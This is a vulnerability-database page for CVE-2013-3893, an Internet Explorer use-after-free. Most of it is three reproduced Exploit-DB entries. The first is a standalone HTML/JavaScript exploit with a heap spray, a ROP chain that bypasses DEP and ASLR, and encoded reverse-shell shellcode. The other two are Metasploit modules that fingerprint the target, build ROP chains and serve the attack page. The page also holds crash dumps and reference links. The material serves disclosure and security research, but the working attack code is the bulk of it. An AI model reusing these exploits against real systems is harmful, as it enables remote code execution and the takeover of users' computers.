CVE-2013-3893 : Detail

CVE-2013-3893

79.81%V4
Network
2013-09-18 08h00 +00:00
2021-05-17 14h06 +00:00

CVE Descriptions

Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE Information

Related Weaknesses

CWE-ID: CWE-399 (Category) - Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

CVSS V2: 9.3 (High) - Vector AV:N/AC:M/Au:N/C:C/I:C/A:C - Source: nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile therefore compares the EPSS score of one CVE with that of all others.

Exploit information

Exploit Database EDB-ID : 49872

Publication date : 2021-05-16 22h00 +00:00
Author : SlidingWindow
EDB Verified : No

# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free # Date: 15/05/2021 # CVE : CVE-2013-3893 # PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json # Exploit Author: SlidingWindow # Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN # Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1) # Bypasses: DEP, ASLR using MSVCR71.DLL # Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training <html> <script> var spraychunks = new Array(); // Use BSTR spray since DEPS spray didn't work here function heapspray() { var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 : # XCHG EAX,ESP # RETN //ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain. ropchain += unescape("%u6bd5%u7c36"); //0x7c366bd5 : # ADD ESP,100 # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //Some padding ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565"); //ESP will point to 0x0c0c122c after stack-heap flip. 
ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //More padding for ADD ESP, 100 ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565"); //rop chain generated with mona.py - www.corelan.be //ropchain needed a little fix ropchain += unescape( "" + // #[---INFO:gadgets_to_set_ebp:---] : "%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll] "%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ebx:---] : "%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll] "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201 "%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll] "%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll] "%uffff%uffff" + // 0xffffffff : ,# "%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll] "%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edx:---] : "%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll] "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040 "%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ecx:---] : "%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll] "%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edi:---] : "%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll] "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) 
[MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_esi:---] : "%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll] "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll] "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll] // "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll] // "%ua051%u7c37" + // 7c37a051 + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "%ua151%u7c37" + // 7c37a151 + + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "" + // #[---INFO:pushad:---] : "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] "" + // #[---INFO:extras:---] : "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll] ""); // : // msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le // First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode var shellcode = 
unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167"); var junk = unescape("%u2020%u2020"); while (junk.length < 0x4000) junk += junk; offset = 0x204/2 ; //0c0c1228 var junk_front = junk.substring(0,offset); var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length) var smallblock = junk_front + ropchain + shellcode + junk_end; var largeblock = ""; while (largeblock.length < 0x80000) { largeblock = largeblock + smallblock; } // make allocations for (i = 0; i < 0x450; i++) { spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2); } } function alloc(nr_alloc){ for (var i=0; i < nr_alloc; i++){ divobj = document.createElement('div'); // Allocate 0x25 (37 decimal) bytes. 
Vulnerable object size = 0x4c bytes divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" + "\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" + "\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858"; } } heapspray(); function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); heapspray(); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { //Vulnerable Object is freed here document.write(""); //Replace/Reclaim the freed object here. //Object size is 0x4c alloc(0x20); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } window.onload = function() { trigger(); } </script> </html> <!-- Debug: Taking a different code path for this exploit First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000 eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 mshtml!CElement::Doc: 7467b68d 8b01 mov eax,dword ptr [ecx] ds:002b:40404040=???????? 0:005> u eip mshtml!CElement::Doc: 7467b68d 8b01 mov eax,dword ptr [ecx] 7467b68f 8b5070 mov edx,dword ptr [eax+70h] 7467b692 ffd2 call edx 7467b694 8b400c mov eax,dword ptr [eax+0Ch] 7467b697 c3 ret 7467b698 90 nop 7467b699 90 nop 7467b69a 90 nop 0:005> ub eip mshtml!CElement::SecurityContext+0x22: 7467b681 8b01 mov eax,dword ptr [ecx] 7467b683 8b5070 mov edx,dword ptr [eax+70h] 7467b686 ffe2 jmp edx 7467b688 90 nop 7467b689 90 nop 7467b68a 90 nop 7467b68b 90 nop 7467b68c 90 nop
Exploit Database EDB-ID : 28682

Publication date : 2013-10-01 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Micorosft Internet Explorer SetMouseCapture Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventuall this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild first spotted in Japan 'sinn3r' # Metasploit (thx binjo for the heads up!) ], 'References' => [ [ 'CVE', '2013-3893' ], [ 'OSVDB', '97380' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ] ], 'Payload' => { 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff" # add esp, -80000 }, 'DefaultOptions' => { 'PrependMigrate' => true, 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Sep 17 2013", 'DefaultTarget' => 0)) end def is_win7_ie9?(agent) (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/) end def get_preq_html(cli, req) %Q| <html> <script> function getDLL() { var checka = 0; var checkb = 0; try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {} try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {} if ((typeof checka) == "object" && (typeof checkb) == "object") { return "office2010"; } else if ((typeof checka) == "number" && (typeof checkb) == "object") { return "office2007"; } return "na"; } window.onload = function() { document.location = "#{get_resource}/#{@exploit_page}?dll=" + getDLL(); } </script> </html> | end def junk return rand_text_alpha(4).unpack("V")[0].to_i end def get_payload(rop_dll) code = payload.encoded rop = '' p = '' case rop_dll when :office2007 rop = [ junk, # Alignment 0x51c46f91, # POP EBP # RETN [hxds.dll] 0x51c46f91, # skip 4 bytes [hxds.dll] 0x51c35a4d, # POP EBX # RETN [hxds.dll] 0xffffffff, 0x51bd90fd, # INC EBX # RETN [hxds.dll] 0x51bd90fd, # INC EBX # RETN [hxds.dll] 0x51bfa98e, # POP EDX # RETN [hxds.dll] 0xffffefff, 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c1df88, # NEG EAX # RETN 
[hxds.dll] 0x51c55c45, # DEC EAX, RETN [hxds.dll] 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c4c17c, # POP ECX # RETN [hxds.dll] 0xffffffc0, 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] 0x51c1df88, # NEG EAX # RETN [hxds.dll] 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] 0x51c05766, # POP EDI # RETN [hxds.dll] 0x51bfbaaf, # RETN (ROP NOP) [hxds.dll] 0x51c2e77d, # POP ESI # RETN [hxds.dll] 0x51bfc840, # JMP [EAX] [hxds.dll] 0x51c05266, # POP EAX # RETN [hxds.dll] 0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll] 0x51bdf91f, # PUSHAD # RETN [hxds.dll] 0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll] ].pack("V*") when :office2010 rop = [ # 4 dword junks due to the add esp in stack pivot junk, junk, junk, junk, 0x51c41953, # POP EBP # RETN [hxds.dll] 0x51be3a03, # RETN (ROP NOP) [hxds.dll] 0x51c41953, # skip 4 bytes [hxds.dll] 0x51c4486d, # POP EBX # RETN [hxds.dll] 0xffffffff, 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] 0x51bd1a77, # INC EAX # RETN [hxds.dll] 0x51bd1a77, # INC EAX # RETN [hxds.dll] 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] 0x51bfa298, # POP EDX # RETN [hxds.dll] 0xffffefff, 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] junk, 0x51bd5382, # DEC EAX # RETN [hxds.dll] 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c1f094, # POP ECX # RETN [hxds.dll] 0xffffffc0, 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] junk, 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] 0x51bf1ff0, # POP EDI # RETN [hxds.dll] 0x51bd5383, # RETN (ROP NOP) [hxds.dll] 0x51c07c8b, # POP ESI # RETN [hxds.dll] 0x51bfc7cb, # JMP [EAX] [hxds.dll] 0x51c44707, # POP EAX # RETN [hxds.dll] 0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll] 0x51c3604e, # PUSHAD # RETN [hxds.dll] 0x51c541ef, # ptr to 'jmp esp' [hxds.dll] ].pack("V*") end p = rop + code p end def get_exploit_html(cli, req, rop_dll) gadgets = {} case rop_dll when :office2007 gadgets[:spray1] = 0x1af40020 # 
0x31610020-0xc4, pointer to gadgets[:call_eax] gadgets[:target] = 0x3160ff5c # mov eax, [esi] # push esi # call [eax+4] gadgets[:call_eax] = 0x51bd1ce8 # xchg eax,esp # add byte [eax], al # pop esi # mov [edi+23c], ebp # mov [edi+238], ebp # mov [edi+234], ebp # pop ebp # pop ebx # ret gadgets[:pivot] = 0x51be4418 when :office2010 gadgets[:spray1] = 0x1a7f0020 # 0x30200020-0xc4, pointer to gadgets[:call_eax] gadgets[:target] = 0x301fff5c # mov eax, [esi] # push esi # call [eax+4] gadgets[:call_eax] = 0x51bd1a41 # xchg eax,esp # add eax,dword ptr [eax] # add esp,10 # mov eax,esi # pop esi # pop ebp # retn 4 gadgets[:pivot] = 0x51c00e64 end p1 = [ gadgets[:target], # Target address gadgets[:pivot] # stack pivot ].pack("V*") p1 << get_payload(rop_dll) p2 = [ gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax) ].pack("V*") js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack("V*")) js_p1 = Rex::Text.to_unescape(p1) js_p2 = Rex::Text.to_unescape(p2) %Q| <html> <script> #{js_property_spray} function loadOffice() { try{location.href='ms-help://'} catch(e){} } var a = new Array(); function spray() { var obj = ''; for (i=0; i<20; i++) { if (i==0) { obj += unescape("#{js_s1}"); } else { obj += "\\u4242\\u4242"; } } obj += "\\u5555"; for (i=0; i<10; i++) { var e = document.createElement("div"); e.className = obj; a.push(e); } var s1 = unescape("#{js_p1}"); sprayHeap({shellcode:s1, maxAllocs:0x300}); var s2 = unescape("#{js_p2}"); sprayHeap({shellcode:s2, maxAllocs:0x300}); } function hit() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); spray(); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } for (i=0; i<20; i++) { document.createElement("frame"); } window.onload = function() { loadOffice(); hit(); } </script> </html> | end def on_request_uri(cli, request) agent = 
request.headers['User-Agent'] unless is_win7_ie9?(agent) print_error("Not a suitable target: #{agent}") send_not_found(cli) end html = '' if request.uri =~ /\?dll=(\w+)$/ rop_dll = '' if $1 == 'office2007' print_status("Using Office 2007 ROP chain") rop_dll = :office2007 elsif $1 == 'office2010' print_status("Using Office 2010 ROP chain") rop_dll = :office2010 else print_error("Target does not have Office installed") send_not_found(cli) return end html = get_exploit_html(cli, request, rop_dll) else print_status("Checking target requirements...") html = get_preq_html(cli, request) end send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end def exploit @exploit_page = "default.html" super end end =begin hxds.dll (Microsoft® Help Data Services Module) 2007 DLL info: ProductVersion: 2.05.50727.198 FileVersion: 2.05.50727.198 (QFE.050727-1900) 2010 DLL info: ProductVersion: 2.05.50727.4039 FileVersion: 2.05.50727.4039 (QFE.050727-4000) mshtml.dll ProductVersion: 9.00.8112.16446 FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400) FileDescription: Microsoft (R) HTML Viewer 0:005> r eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CTreeNode::GetInterface+0xd8: 679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? 66e13df7 8b0e mov ecx,dword ptr [esi] 66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000) 66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h] 66e13e01 ffd0 call eax =end
Exploit Database EDB-ID : 28974

Publication date : 2013-10-14 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "8.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => NormalRanking }) def initialize(info={}) super(update_info(info, 'Name' => "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", 'Description' => %q{ This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a "onpropertychange" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called "onselect". The "onselect" event will allow us to set up for the actual event handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". 
During "onpropertychange" event handling, a free of the CDisplayPointer object can be forced by using an "Unslect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-3897' ], [ 'OSVDB', '98207' ], [ 'MSB', 'MS13-080' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ], [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', {} ], [ 'IE 8 on Windows 7', {} ] ], 'Payload' => { 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, # Jsunpack first received a sample to analyze on Sep 12 2013. # MSFT patched this on Oct 8th. 
'DisclosureDate' => "Oct 08 2013", 'DefaultTarget' => 0)) end def get_check_html %Q|<html> <script> #{js_os_detect} function os() { var detect = window.os_detect.getVersion(); var os_string = detect.os_name + " " + detect.os_flavor + " " + detect.ua_name + " " + detect.ua_version; return os_string; } function dll() { var checka = 0; var checkb = 0; try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {} try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {} if ((typeof checka) == "object" && (typeof checkb) == "object") { try{location.href='ms-help://'} catch(e){} return "#{@js_office_2010_str}"; } else if ((typeof checka) == "number" && (typeof checkb) == "object") { try{location.href='ms-help://'} catch(e){} return "#{@js_office_2007_str}"; } return "#{@js_default_str}"; } window.onload = function() { window.location = "#{get_resource}/search?o=" + escape(os()) + "&d=" + dll(); } </script> </html> | end def junk rand_text_alpha(4).unpack("V")[0].to_i end def get_payload(target_info) rop_payload = '' os = target_info[:os] dll_used = '' case target_info[:dll] when @js_office_2007_str dll_used = "Office 2007" pivot = [ 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4 junk, # ESI due to POPAD junk, # EBP due to POPAD junk, junk, # EBX due to POPAD junk, # EDX due to POPAD junk, # ECX due to POPAD 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction) 0x51bd81db, # ROP NOP junk # Padding for the retn 4 from the stack pivot ].pack("V*") rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot}) when @js_office_2010_str dll_used = "Office 2010" pivot = [ 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4 junk, junk, junk, junk, junk, 0x51BE7E9A, # ROP NOP junk # Padding for the retn 4 from the stack pivot ].pack("V*") rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 
'pivot'=>pivot}) when @js_default_str if target_info[:os] =~ /windows xp/i # XP uses msvcrt.dll dll_used = "msvcrt" pivot = [ 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret ].pack("V*") rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot}) else # Assuming this is Win 7, and we'll use Java 6 ROP dll_used = "Java" pivot = [ 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn junk # Padding for the POP ECX ].pack("V*") rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot}) end end print_status("Target uses #{os} with #{dll_used} DLL") rop_payload end def get_sploit_html(target_info) os = target_info[:os] js_payload = '' if os =~ /Windows (7|XP) MSIE 8\.0/ js_payload = Rex::Text.to_unescape(get_payload(target_info)) else print_error("Target not supported by this attack.") return "" end %Q|<html> <head> <script> #{js_property_spray} sprayHeap({shellcode:unescape("#{js_payload}")}); var earth = document; var data = ""; for (i=0; i<17; i++) { if (i==7) { data += unescape("%u2020%u2030"); } else { data += "\\u4141\\u4141"; } } data += "\\u4141"; function butterfly() { for(i=0; i<20; i++) { var effect = earth.createElement("div"); effect.className = data; } } function kaiju() { var godzilla = earth.createElement("textarea"); var minilla = earth.createElement("pre"); earth.body.appendChild(godzilla); earth.body.appendChild(minilla); godzilla.appendChild(minilla); godzilla.onselect=function(e) { minilla.swapNode(earth.createElement("div")); } var battleStation = false; var war = new Array(); godzilla.onpropertychange=function(e) { if (battleStation == true) { for (i=0; i<50; i++) { war.push(earth.createElement("span")); } } earth.execCommand("Unselect"); if (battleStation == true) { for (i=0; i < war.length; i++) { war[i].className = data; } } else { battleStation = true; } } butterfly(); godzilla.select(); } </script> </head> <body onload='kaiju()'> </body> </html> | end 
def on_request_uri(cli, request) if request.uri =~ /search\?o=(.+)\&d=(.+)$/ target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) } sploit = get_sploit_html(target_info) send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) return end html = get_check_html print_status("Checking out target...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end def exploit @js_office_2007_str = Rex::Text.rand_text_alpha(4) @js_office_2010_str = Rex::Text.rand_text_alpha(5) @js_default_str = Rex::Text.rand_text_alpha(6) super end end =begin +hpa this for debugging or you might not see a crash at all :-) 0:005> r eax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c eip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!QIClassID+0x30: 6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=???????? 0:005> u mshtml!QIClassID+0x30: 6d6dc123 8b03 mov eax,dword ptr [ebx] 6d6dc125 8365e800 and dword ptr [ebp-18h],0 6d6dc129 8d4de8 lea ecx,[ebp-18h] 6d6dc12c 51 push ecx 6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170) 6d6dc132 53 push ebx 6d6dc133 bf02400080 mov edi,80004002h 6d6dc138 ff10 call dword ptr [eax] =end

Products Mentioned

Configuration 0

Microsoft>>Internet_explorer >> Version 6

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Internet_explorer >> Version 9

Microsoft>>Internet_explorer >> Version 10

Microsoft>>Internet_explorer >> Version 11

References

http://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-000093.html
Tags : third-party-advisory, x_refsource_JVNDB
http://jvn.jp/en/jp/JVN27443259/index.html
Tags : third-party-advisory, x_refsource_JVN
http://www.securityfocus.com/bid/62453
Tags : vdb-entry, x_refsource_BID
http://www.us-cert.gov/ncas/alerts/TA13-288A
Tags : third-party-advisory, x_refsource_CERT